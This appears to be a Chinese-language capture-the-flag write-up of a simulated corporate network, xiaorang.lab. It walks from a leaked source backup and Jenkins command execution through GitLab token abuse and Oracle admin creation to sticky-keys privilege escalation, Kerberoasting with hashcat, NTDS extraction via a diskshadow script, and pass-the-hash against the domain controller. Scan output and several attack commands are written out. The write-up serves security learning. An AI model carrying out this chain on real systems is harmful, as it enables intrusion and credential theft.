先上fscan扫一波,扫到www.zip

img

下载下来审计源码,发现存在任意文件读取

img

根据题目给出的hint读取flag

img
img

根据前面的hint读取服务器初始密码

img

登录Jenkins的后台

img

Manage Jenkins -> Script Console执行命令

添加一个管理员用户

img

传个fscan上去扫一下,除本机外还有四台机器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
C:\Users\st4rr\Desktop>fscan.exe -h 172.22.14.7/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.14.7     is alive
(icmp) Target 172.22.14.11    is alive
(icmp) Target 172.22.14.16    is alive
(icmp) Target 172.22.14.31    is alive
(icmp) Target 172.22.14.46    is alive
[*] Icmp alive hosts len is: 5
172.22.14.31:139 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.11:445 open
172.22.14.7:445 open
172.22.14.46:139 open
172.22.14.11:139 open
172.22.14.46:135 open
172.22.14.31:135 open
172.22.14.7:139 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.7:8080 open
172.22.14.16:8060 open
172.22.14.31:1521 open
172.22.14.7:3306 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo
[*]172.22.14.7
   [->]XR-JENKINS
   [->]172.22.14.7
[*] NetInfo
[*]172.22.14.11
   [->]XR-DC
   [->]172.22.14.11
[*] WebTitle http://172.22.14.7:8080   code:403 len:548    title:None
[*] WebTitle http://172.22.14.16:8060  code:404 len:555    title:404 Not Found
[*] NetInfo
[*]172.22.14.46
   [->]XR-0923
   [->]172.22.14.46
[*] NetInfo
[*]172.22.14.31
   [->]XR-ORACLE
   [->]172.22.14.31
[*] NetBios 172.22.14.31    WORKGROUP\XR-ORACLE
[*] NetBios 172.22.14.46    XIAORANG\XR-0923
[*] NetBios 172.22.14.11    [+] DC:XIAORANG\XR-DC
[*] WebTitle http://172.22.14.46       code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.14.7        code:200 len:54603  title:XR SHOP
[*] WebTitle http://172.22.14.16       code:302 len:99     title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961  title:Sign in · GitLab
[+] PocScan http://172.22.14.7/www.zip poc-yaml-backup-file
已完成 22/22
[*] 扫描结束,耗时: 50.4186109s

题目提示了gitlab,去找一下apitoken

img
img

回到jenkins解密一下

img

chisel搭建一下隧道

img
img

看一下gitlab上有哪些项目

1
2
3
4
5
6
7
(base) ┌──(root㉿WIN-EICAC432NIT)-[/home/starr]
└─# proxychains4 curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  60.204.245.37:6000  ...  172.22.14.16:80  ...  OK
[{"id":6,"description":null,"name":"Internal Secret","name_with_namespace":"XRLAB / Internal Secret","path":"internal-secret","path_with_namespace":"xrlab/internal-secret","created_at":"2022-12-25T08:30:12.362Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:xrlab/internal-secret.git","http_url_to_repo":"http://gitlab.xiaorang.lab/xrlab/internal-secret.git","web_url":"http://gitlab.xiaorang.lab/xrlab/internal-secret","readme_url":null,"avatar_url":null,"forks_count":0,"star_count":0,"last_activity_at":"2022-12-25T08:30:12.362Z","namespace":{"id":8,"name":"XRLAB","path":"xrlab","kind":"group","full_path":"xrlab","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/xrlab"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/6","issues":"http://gitlab.xiaorang.lab/api/v4/projects/6/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/6/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/6/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/6/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"},"packages_enabled":true,"empty_repo":false,"archived":false,"visibility":"private","resolve_outdated_diff_discussions":false,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T08:30:12.373Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":true,"jobs_enabled":true,"snippets_enabled":true,"container_registry_enabled":true,"service_desk_enabled":false,"service_desk_address":null,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"enabled","builds_access_level":"enabled","snippets_access_level":"enabled","pages_access_level":"private","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"enabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":2,"import_url":null,"import_type":null,"import_status":"none","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":true,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":true,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":null,"group_access":{"access_level":50,"notification_level":3}}},{"id":4,"description":null,"name":"XRAdmin","name_with_namespace":"XRLAB / XRAdmin","path":"xradmin","path_with_namespace":"xrlab/xradmin","created_at":"2022-12-25T07:48:16.751Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:xrlab/xradmin.git","http_url_to_repo":"http://gitlab.xiaorang.lab/xrlab/xradmin.git","web_url":"http://gitlab.xiaorang.lab/xrlab/xradmin","readme_url":"http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md","avatar_url":null,"forks_count":0,"star_count":0,"last_activity_at":"2023-05-30T10:27:31.762Z","namespace":{"id":8,"name":"XRLAB","path":"xrlab","kind":"group","full_path":"xrlab","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/xrlab"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/4","issues":"http://gitlab.xiaorang.lab/api/v4/projects/4/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/4/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/4/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/4/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/4/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/4/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/4/cluster_agents"},"packages_enabled":true,"empty_repo":false,"archived":false,"visibility":"private","resolve_outdated_diff_discussions":false,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T07:48:16.788Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":true,"jobs_enabled":true,"snippets_enabled":true,"container_registry_enabled":true,"service_desk_enabled":false,"service_desk_address":null,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"enabled","builds_access_level":"enabled","snippets_access_level":"enabled","pages_access_level":"private","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"enabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":2,"import_url":null,"import_type":null,"import_status":"none","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":true,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":false,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":null,"group_access":{"access_level":50,"notification_level":3}}},{"id":3,"description":null,"name":"Awenode","name_with_namespace":"XRLAB / Awenode","path":"awenode","path_with_namespace":"xrlab/awenode","created_at":"2022-12-25T07:46:43.635Z","default_branch":"master","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:xrlab/awenode.git","http_url_to_repo":"http://gitlab.xiaorang.lab/xrlab/awenode.git","web_url":"http://gitlab.xiaorang.lab/xrlab/awenode","readme_url":"http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md","avatar_url":null,"forks_count":0,"star_count":0,"last_activity_at":"2022-12-25T07:46:43.635Z","namespace":{"id":8,"name":"XRLAB","path":"xrlab","kind":"group","full_path":"xrlab","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/xrlab"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/3","issues":"http://gitlab.xiaorang.lab/api/v4/projects/3/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/3/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/3/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/3/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/3/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/3/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/3/cluster_agents"},"packages_enabled":true,"empty_repo":false,"archived":false,"visibility":"private","resolve_outdated_diff_discussions":false,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T07:46:44.614Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":true,"jobs_enabled":true,"snippets_enabled":true,"container_registry_enabled":true,"service_desk_enabled":false,"service_desk_address":null,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"enabled","builds_access_level":"enabled","snippets_access_level":"enabled","pages_access_level":"private","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"enabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":2,"import_url":null,"import_type":"gitlab_project","import_status":"finished","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":true,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":true,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":{"access_level":40,"notification_level":null},"group_access":{"access_level":50,"notification_level":3}}},{"id":2,"description":"Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook","name":"XRWiki","name_with_namespace":"XRLAB / XRWiki","path":"xrwiki","path_with_namespace":"xrlab/xrwiki","created_at":"2022-12-25T07:44:18.589Z","default_branch":"master","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:xrlab/xrwiki.git","http_url_to_repo":"http://gitlab.xiaorang.lab/xrlab/xrwiki.git","web_url":"http://gitlab.xiaorang.lab/xrlab/xrwiki","readme_url":"http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md","avatar_url":"http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png","forks_count":0,"star_count":0,"last_activity_at":"2022-12-25T07:44:18.589Z","namespace":{"id":8,"name":"XRLAB","path":"xrlab","kind":"group","full_path":"xrlab","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/xrlab"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/2","issues":"http://gitlab.xiaorang.lab/api/v4/projects/2/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/2/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/2/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/2/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/2/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/2/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/2/cluster_agents"},"packages_enabled":true,"empty_repo":false,"archived":false,"visibility":"private","resolve_outdated_diff_discussions":null,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T07:44:18.627Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":false,"jobs_enabled":true,"snippets_enabled":false,"container_registry_enabled":false,"service_desk_enabled":false,"service_desk_address":null,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"disabled","builds_access_level":"enabled","snippets_access_level":"disabled","pages_access_level":"public","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"disabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":2,"import_url":null,"import_type":"gitlab_project","import_status":"finished","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":false,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":true,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":{"access_level":40,"notification_level":null},"group_access":{"access_level":50,"notification_level":3}}},{"id":1,"description":"This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).","name":"Monitoring","name_with_namespace":"GitLab Instance / Monitoring","path":"Monitoring","path_with_namespace":"gitlab-instance-23352f48/Monitoring","created_at":"2022-12-25T07:18:20.914Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git","http_url_to_repo":"http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git","web_url":"http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring","readme_url":null,"avatar_url":null,"forks_count":0,"star_count":0,"last_activity_at":"2022-12-25T07:18:20.914Z","namespace":{"id":2,"name":"GitLab Instance","path":"gitlab-instance-23352f48","kind":"group","full_path":"gitlab-instance-23352f48","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/1","issues":"http://gitlab.xiaorang.lab/api/v4/projects/1/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/1/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/1/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/1/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/1/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/1/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/1/cluster_agents"},"packages_enabled":true,"empty_repo":true,"archived":false,"visibility":"internal","resolve_outdated_diff_discussions":false,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T07:18:21.108Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":true,"jobs_enabled":true,"snippets_enabled":true,"container_registry_enabled":true,"service_desk_enabled":false,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"enabled","builds_access_level":"enabled","snippets_access_level":"enabled","pages_access_level":"private","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"enabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":1,"import_status":"none","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":true,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":true,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":null,"group_access":null}}]

总共有四个项目,全部克隆下来

1
2
3
4
proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git
proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git
proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/awenode.git

在xradmin/ruoyi-admin/src/main/resources/appliaction-druid.yml中能找到oracle数据库的账号密码

img

由于xradmin有dba权限,所以可以用odat直接添加管理员用户

img

rdp连上去拿flag

img

之前扫到有一台机器叫XR-0923,在之前下载的internal-secret/credential.txt中可以找到对应的账号密码

img

rdp连上去,查看用户权限

img

用户属于Remote Desktop Users和Remote Management Use两个组,因此可以用evil-winrm连上去

img

查看用户权限,有了SeRestorePrivilege权限,因此可以直接修改注册表

img

劫持粘滞键sethc.exe

img

注销后按五次shift,提权成功

img

读flag

img

添加一个管理员用户

img

上传mimikatz抓一下哈希

img

找有spn的用户,找到一个tianjing

img

获取其哈希

img

hashcat爆破

1
hashcat -m 13100 -a 0 1.txt /usr/share/wordlists/rockyou.txt --force
img

用evil-winrm登上去,看下权限

img

有备份和还原目录的权限,可以用卷影拷贝读SAM

本地创建一个raj.dsh,内容为

1
2
3
4
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

unix2dos转换为windows的编码格式

img

在靶机上创建一个目录,把raj.dsh传上去,然后用diskshadow执行

img

复制到当前目录

img

下载ntds,好慢

img

下载SYSTEM

img

本地获取ntlm hash

img

对域控打pth拿最后一个flag

img